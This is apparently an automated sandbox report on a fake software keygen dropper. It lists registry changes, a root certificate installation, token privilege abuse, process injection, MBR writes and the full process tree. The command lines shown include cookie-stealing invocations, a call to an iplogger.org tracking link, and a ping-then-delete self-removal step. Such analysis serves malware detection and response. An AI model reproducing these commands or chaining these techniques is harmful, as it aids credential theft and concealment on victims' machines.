Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000036c1d0b620b3a89278492431a34257ecde22bd30341ebf1325588ee35326512dbe4767798b3f39da2644f6647918b248d35fb9516f7f93a25f55	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{C3B8F160-0A70-465B-B843-4B38298BE259}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

intro.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	intro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	intro.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4464 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

SmartClock.exe

pid process

4584 SmartClock.exe

pid	process
4464	PING.EXE

pid	process
4584	SmartClock.exe

Suspicious behavior: EnumeratesProcesses 2123 IoCs

Processes:

key.exe1609004644016.exe23e04c4f32ef2158.tmpseed.exe

pid	process
3592	key.exe
3592	key.exe
2284	1609004644016.exe
2284	1609004644016.exe
1440	23e04c4f32ef2158.tmp
1440	23e04c4f32ef2158.tmp
3968	seed.exe
3968	seed.exe
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

MicrosoftEdgeCP.exeseed.exe8B3E.exe9189.exe

pid process

4136 MicrosoftEdgeCP.exe
3968 seed.exe
3936 8B3E.exe
856 9189.exe

pid	process
4136	MicrosoftEdgeCP.exe
3968	seed.exe
3936	8B3E.exe
856	9189.exe

Suspicious use of AdjustPrivilegeToken 126 IoCs

Processes:

key.exeMiniThunderPlatform.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemd2_2efs.exeMicrosoftEdgeCP.exe

description	pid	process
Token: SeImpersonatePrivilege	3592	key.exe
Token: SeTcbPrivilege	3592	key.exe
Token: SeChangeNotifyPrivilege	3592	key.exe
Token: SeCreateTokenPrivilege	3592	key.exe
Token: SeBackupPrivilege	3592	key.exe
Token: SeRestorePrivilege	3592	key.exe
Token: SeIncreaseQuotaPrivilege	3592	key.exe
Token: SeAssignPrimaryTokenPrivilege	3592	key.exe
Token: SeImpersonatePrivilege	3592	key.exe
Token: SeTcbPrivilege	3592	key.exe
Token: SeChangeNotifyPrivilege	3592	key.exe
Token: SeCreateTokenPrivilege	3592	key.exe
Token: SeBackupPrivilege	3592	key.exe
Token: SeRestorePrivilege	3592	key.exe
Token: SeIncreaseQuotaPrivilege	3592	key.exe
Token: SeAssignPrimaryTokenPrivilege	3592	key.exe
Token: SeImpersonatePrivilege	3592	key.exe
Token: SeTcbPrivilege	3592	key.exe
Token: SeChangeNotifyPrivilege	3592	key.exe
Token: SeCreateTokenPrivilege	3592	key.exe
Token: SeBackupPrivilege	3592	key.exe
Token: SeRestorePrivilege	3592	key.exe
Token: SeIncreaseQuotaPrivilege	3592	key.exe
Token: SeAssignPrimaryTokenPrivilege	3592	key.exe
Token: SeImpersonatePrivilege	3592	key.exe
Token: SeTcbPrivilege	3592	key.exe
Token: SeChangeNotifyPrivilege	3592	key.exe
Token: SeCreateTokenPrivilege	3592	key.exe
Token: SeBackupPrivilege	3592	key.exe
Token: SeRestorePrivilege	3592	key.exe
Token: SeIncreaseQuotaPrivilege	3592	key.exe
Token: SeAssignPrimaryTokenPrivilege	3592	key.exe
Token: SeImpersonatePrivilege	3592	key.exe
Token: SeTcbPrivilege	3592	key.exe
Token: SeChangeNotifyPrivilege	3592	key.exe
Token: SeCreateTokenPrivilege	3592	key.exe
Token: SeBackupPrivilege	3592	key.exe
Token: SeRestorePrivilege	3592	key.exe
Token: SeIncreaseQuotaPrivilege	3592	key.exe
Token: SeAssignPrimaryTokenPrivilege	3592	key.exe
Token: SeManageVolumePrivilege	3940	MiniThunderPlatform.exe
Token: SeDebugPrivilege	3012	MicrosoftEdge.exe
Token: SeDebugPrivilege	3012	MicrosoftEdge.exe
Token: SeDebugPrivilege	3012	MicrosoftEdge.exe
Token: SeDebugPrivilege	3012	MicrosoftEdge.exe
Token: SeDebugPrivilege	4200	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4200	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4200	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4200	MicrosoftEdgeCP.exe
Token: SeManageVolumePrivilege	4420	md2_2efs.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeManageVolumePrivilege	4420	md2_2efs.exe
Token: SeDebugPrivilege	4672	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4672	MicrosoftEdgeCP.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

23e04c4f32ef2158.tmp

pid process

1440 23e04c4f32ef2158.tmp

pid	process
1440	23e04c4f32ef2158.tmp

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

ElectraSoft_FaxMail_Network_keygen_by_aaocg.exeSetup.exe1609004644016.exeThunderFW.exeMiniThunderPlatform.exe23e04c4f32ef2158.exe23e04c4f32ef2158.tmpseed.sfx.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	process
528	ElectraSoft_FaxMail_Network_keygen_by_aaocg.exe
528	ElectraSoft_FaxMail_Network_keygen_by_aaocg.exe
3800	Setup.exe
2284	1609004644016.exe
1872	ThunderFW.exe
3940	MiniThunderPlatform.exe
1824	23e04c4f32ef2158.exe
1440	23e04c4f32ef2158.tmp
3816	seed.sfx.exe
3012	MicrosoftEdge.exe
4136	MicrosoftEdgeCP.exe
4136	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 209 IoCs

Processes:

cmd.exekeygen-pr.exekeygen-step-4.exe002.exekey.exeSetup.exe23e04c4f32ef2158.exe23e04c4f32ef2158.tmpseed.sfx.exe

description	pid	process	target process
PID 3816 wrote to memory of 1728	3816	cmd.exe	intro.exe
PID 3816 wrote to memory of 1728	3816	cmd.exe	intro.exe
PID 3816 wrote to memory of 1728	3816	cmd.exe	intro.exe
PID 3816 wrote to memory of 492	3816	cmd.exe	keygen-pr.exe
PID 3816 wrote to memory of 492	3816	cmd.exe	keygen-pr.exe
PID 3816 wrote to memory of 492	3816	cmd.exe	keygen-pr.exe
PID 3816 wrote to memory of 2836	3816	cmd.exe	keygen-step-1.exe
PID 3816 wrote to memory of 2836	3816	cmd.exe	keygen-step-1.exe
PID 3816 wrote to memory of 2836	3816	cmd.exe	keygen-step-1.exe
PID 3816 wrote to memory of 2736	3816	cmd.exe	keygen-step-3.exe
PID 3816 wrote to memory of 2736	3816	cmd.exe	keygen-step-3.exe
PID 3816 wrote to memory of 2736	3816	cmd.exe	keygen-step-3.exe
PID 3816 wrote to memory of 2772	3816	cmd.exe	keygen-step-4.exe
PID 3816 wrote to memory of 2772	3816	cmd.exe	keygen-step-4.exe
PID 3816 wrote to memory of 2772	3816	cmd.exe	keygen-step-4.exe
PID 492 wrote to memory of 3592	492	keygen-pr.exe	key.exe
PID 492 wrote to memory of 3592	492	keygen-pr.exe	key.exe
PID 492 wrote to memory of 3592	492	keygen-pr.exe	key.exe
PID 2772 wrote to memory of 508	2772	keygen-step-4.exe	002.exe
PID 2772 wrote to memory of 508	2772	keygen-step-4.exe	002.exe
PID 2772 wrote to memory of 508	2772	keygen-step-4.exe	002.exe
PID 508 wrote to memory of 1304	508	002.exe	LZMA.exe
PID 508 wrote to memory of 1304	508	002.exe	LZMA.exe
PID 508 wrote to memory of 1304	508	002.exe	LZMA.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 3592 wrote to memory of 1732	3592	key.exe	key.exe
PID 2772 wrote to memory of 3800	2772	keygen-step-4.exe	Setup.exe
PID 2772 wrote to memory of 3800	2772	keygen-step-4.exe	Setup.exe
PID 2772 wrote to memory of 3800	2772	keygen-step-4.exe	Setup.exe
PID 3800 wrote to memory of 2284	3800	Setup.exe	1609004644016.exe
PID 3800 wrote to memory of 2284	3800	Setup.exe	1609004644016.exe
PID 3800 wrote to memory of 2284	3800	Setup.exe	1609004644016.exe
PID 3800 wrote to memory of 1872	3800	Setup.exe	ThunderFW.exe
PID 3800 wrote to memory of 1872	3800	Setup.exe	ThunderFW.exe
PID 3800 wrote to memory of 1872	3800	Setup.exe	ThunderFW.exe
PID 3800 wrote to memory of 3940	3800	Setup.exe	MiniThunderPlatform.exe
PID 3800 wrote to memory of 3940	3800	Setup.exe	MiniThunderPlatform.exe
PID 3800 wrote to memory of 3940	3800	Setup.exe	MiniThunderPlatform.exe
PID 3800 wrote to memory of 1824	3800	Setup.exe	23e04c4f32ef2158.exe
PID 3800 wrote to memory of 1824	3800	Setup.exe	23e04c4f32ef2158.exe
PID 3800 wrote to memory of 1824	3800	Setup.exe	23e04c4f32ef2158.exe
PID 1824 wrote to memory of 1440	1824	23e04c4f32ef2158.exe	23e04c4f32ef2158.tmp
PID 1824 wrote to memory of 1440	1824	23e04c4f32ef2158.exe	23e04c4f32ef2158.tmp
PID 1824 wrote to memory of 1440	1824	23e04c4f32ef2158.exe	23e04c4f32ef2158.tmp
PID 1440 wrote to memory of 3816	1440	23e04c4f32ef2158.tmp	seed.sfx.exe
PID 1440 wrote to memory of 3816	1440	23e04c4f32ef2158.tmp	seed.sfx.exe
PID 1440 wrote to memory of 3816	1440	23e04c4f32ef2158.tmp	seed.sfx.exe
PID 1440 wrote to memory of 3140	1440	23e04c4f32ef2158.tmp	cmd.exe
PID 1440 wrote to memory of 3140	1440	23e04c4f32ef2158.tmp	cmd.exe
PID 1440 wrote to memory of 3140	1440	23e04c4f32ef2158.tmp	cmd.exe
PID 3816 wrote to memory of 3968	3816	seed.sfx.exe	seed.exe

C:\Users\Admin\AppData\Local\Temp\ElectraSoft_FaxMail_Network_keygen_by_aaocg.exe
"C:\Users\Admin\AppData\Local\Temp\ElectraSoft_FaxMail_Network_keygen_by_aaocg.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:528

C:\Users\Admin\Desktop\keygen-step-3.exe
"C:\Users\Admin\Desktop\keygen-step-3.exe"
1⤵
- Executes dropped EXE
PID:2944

C:\Users\Admin\Desktop\keygen-step-1.exe
"C:\Users\Admin\Desktop\keygen-step-1.exe"
1⤵
- Executes dropped EXE
PID:1268

C:\Users\Admin\Desktop\keygen-pr.exe
"C:\Users\Admin\Desktop\keygen-pr.exe"
1⤵
- Executes dropped EXE
PID:672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\keygen.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3816

C:\Users\Admin\Desktop\intro.exe
intro.exe 1O5ZF
2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1728

C:\Users\Admin\Desktop\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:492

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3592

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe -txt -scanlocal -file:potato.dat
4⤵
- Executes dropped EXE
PID:1732

C:\Users\Admin\Desktop\keygen-step-1.exe
keygen-step-1.exe
2⤵
- Executes dropped EXE
PID:2836

C:\Users\Admin\Desktop\keygen-step-3.exe
keygen-step-3.exe
2⤵
- Executes dropped EXE
PID:2736

C:\Users\Admin\Desktop\keygen-step-4.exe
keygen-step-4.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2772

C:\Users\Admin\AppData\Local\Temp\RarSFX1\002.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\002.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:508

C:\Users\Admin\AppData\Local\Temp\RarSFX1\LZMA.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\LZMA.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1304

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3800

C:\Users\Admin\AppData\Roaming\1609004644016.exe
"C:\Users\Admin\AppData\Roaming\1609004644016.exe" /sjson "C:\Users\Admin\AppData\Roaming\1609004644016.txt"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2284

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1872

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3940

C:\Users\Admin\AppData\Local\Temp\23e04c4f32ef2158.exe
C:\Users\Admin\AppData\Local\Temp\23e04c4f32ef2158.exe /silent
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1824

C:\Users\Admin\AppData\Local\Temp\is-J59GE.tmp\23e04c4f32ef2158.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J59GE.tmp\23e04c4f32ef2158.tmp" /SL5="$6007C,817849,121344,C:\Users\Admin\AppData\Local\Temp\23e04c4f32ef2158.exe" /silent
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1440

C:\Program Files (x86)\RearRips\seed.sfx.exe
"C:\Program Files (x86)\RearRips\seed.sfx.exe" -pX7mdks39WE0 -s1
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3816

C:\Program Files (x86)\Seed Trade\Seed\seed.exe
"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3968

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/14Zhe7"
6⤵
- Checks computer location settings
PID:3140

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
PID:4384

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
5⤵
- Runs ping.exe
PID:4464

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4420

C:\Users\Admin\AppData\Local\Temp\RarSFX1\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\hjjgaa.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4432

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:4612

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:4852

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
